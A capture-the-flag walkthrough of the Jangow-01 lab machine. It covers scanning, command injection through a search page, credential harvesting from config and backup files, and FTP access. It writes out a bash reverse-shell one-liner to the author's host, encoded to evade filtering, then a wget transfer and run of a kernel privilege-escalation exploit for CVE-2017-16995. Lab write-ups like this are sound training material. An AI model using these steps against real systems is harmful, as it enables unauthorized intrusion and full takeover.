Jangow-01–1.0.1 Walkthrough | By Aasrith

At first, I have discovered the IP address of the target machine using netdiscover. 192.168.56.118 is the IP address of the target machine.

And after that, I have scanned for open ports of the machine using nmap.

Here, there are 2 open ports. ftp 21 and http 80.

Then I tried to access the http port using browser as shown below.

Here, I could see site/ directory. So I clicked on it. And found the webpage as shown below.

Then, I have viewed the source code of the webpage to check any hidden information. But I found nothing important.

I have scrolled down and here, I found that, after scrolling to the last, it not accessing Buscar page.

So, I have clicked on Buscar and found something Interesting.

Then, I have further enumerated using gobuster to check for any hidden directories.

Even here, I found nothing important. So, I have enumerated more deeper on /site directory.

Here, I found wordpress directory. So I have navigated through it. And found a broken wordpress page as shown below.

Then, I went back to buscar page for further for making command injection. I have entered id and found this.

Then I have viewed the source code of the page. And then I have checked the list of files using ls. And found this.

Here, I could see the wordpress file. So I have checked the file contents of it by entering the command cd wordpress; ls. And, here I found this.

Here, I could see something Interesting. The file config.php. Then, I have viewed the file using the command cd wordpress; cat config.php.

Here, I got some credentials. So now, I have tried using this credentials for accessing ftp. But it is failed as shown below.

Then, I have entered pwd command to check it' s path. And found this as shown below.

So, I have checked the file contents of /var/www/html using the command cd /var/www/html; ls -la.

Here, I found .backup file. I have viewed this file using command cd /var/www/html; cat .backup. And found this as shown below.

Here, I found credentials. Using this credentials, I can able to successfully access ftp as shown below.

Then I have entered ls -la command to check file contents. And found this as shown below.

Then I have changed the directory to /home and again checked for file contents and found this as shown below.

And here, I could see jangow01 directory. Then, again I changed the directory to jangow01 and checked for file contents and found this as shown below.

Here, I could see the file user.txt. Then I have save this file to my local machine using get command, as shown below.

Then, I have viewed the file in my local machine using cat as shown below.

Hence I found the user flag.

Now, for getting root access, I have tried to inject the bashscript. /bin/bash -c 'bash -i >&/dev/tcp/192.168.56.106/443 0>&1 ' The IP address for the bash script it of my local machine IP addresss

At first, I have started a netcat listener on the port 443. As shown below.

But here what the thing is, while injecting it, the machine detects and it won't allow it. So I tried to enter it by encoding the bash script as shown below.

Then, I have copied the encoded bash script and pasted in buscar as shown below.

Now, I got the shell in netcat as shown below.

I have checked for the version by using the command uname -a as shown above.

Then, I have searched for the exploits on this version. And found an exploit. As shown below.

OffSec's Exploit Database Archive Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation. CVE-2017-16995 . local exploit for Linux…

Then, I have downloaded the exploit. Now, I have to transfer this exploit file from my local machine to target machine. For that, I have started a python server on port 443 as shown below.

And then, I have transferred the exploit from my local machine using wget command as shown below.

Now, I have viewed the file contents and found this as shown below.

Now, here expliot doesn't have permissions. So, I have modified permissions using chmod as shown below.

And then, I have compiled this file using commad gcc 45010.c -o out. And viewed the file contents as shown below.

Now I have ran the exploit using the command ./out as shown below.

Hence, now I got root access. I could able to see the root flag in proof.txt